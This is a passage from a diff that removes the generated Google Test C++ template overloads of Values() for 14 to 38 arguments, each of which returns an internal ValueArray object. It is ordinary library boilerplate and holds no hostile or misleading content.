-    typename T11, typename T12, typename T13, typename T14>
-internal::ValueArray14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14) {
-  return internal::ValueArray14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-internal::ValueArray15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15) {
-  return internal::ValueArray15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-internal::ValueArray16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16) {
-  return internal::ValueArray16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-internal::ValueArray17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17) {
-  return internal::ValueArray17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-internal::ValueArray18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18) {
-  return internal::ValueArray18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-internal::ValueArray19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19) {
-  return internal::ValueArray19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-internal::ValueArray20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20) {
-  return internal::ValueArray20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-internal::ValueArray21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21) {
-  return internal::ValueArray21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-internal::ValueArray22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22) {
-  return internal::ValueArray22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-internal::ValueArray23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23) {
-  return internal::ValueArray23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-internal::ValueArray24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24) {
-  return internal::ValueArray24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24>(v1, v2,
-      v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18,
-      v19, v20, v21, v22, v23, v24);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-internal::ValueArray25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11,
-    T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19,
-    T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25) {
-  return internal::ValueArray25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17,
-      v18, v19, v20, v21, v22, v23, v24, v25);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-internal::ValueArray26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-    T26> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26) {
-  return internal::ValueArray26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15,
-      v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-internal::ValueArray27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-    T27> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27) {
-  return internal::ValueArray27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14,
-      v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-internal::ValueArray28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-    T28> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28) {
-  return internal::ValueArray28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27,
-      v28);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-internal::ValueArray29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29) {
-  return internal::ValueArray29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26,
-      v27, v28, v29);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-internal::ValueArray30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-    T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-    T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30) {
-  return internal::ValueArray30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25,
-      v26, v27, v28, v29, v30);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-internal::ValueArray31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31) {
-  return internal::ValueArray31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24,
-      v25, v26, v27, v28, v29, v30, v31);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-internal::ValueArray32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32) {
-  return internal::ValueArray32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-internal::ValueArray33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33) {
-  return internal::ValueArray33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-internal::ValueArray34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22,
-    T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30,
-    T31 v31, T32 v32, T33 v33, T34 v34) {
-  return internal::ValueArray34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22,
-      v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-internal::ValueArray35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35) {
-  return internal::ValueArray35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21,
-      v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-internal::ValueArray36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36) {
-  return internal::ValueArray36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-internal::ValueArray37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37) {
-  return internal::ValueArray37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36, v37);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-internal::ValueArray38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37, T38 v38) {
-  return internal::ValueArray38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38>(v1, v2,
-      v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18,
-      v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32,
-      v33, v34, v35, v36, v37, v38);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
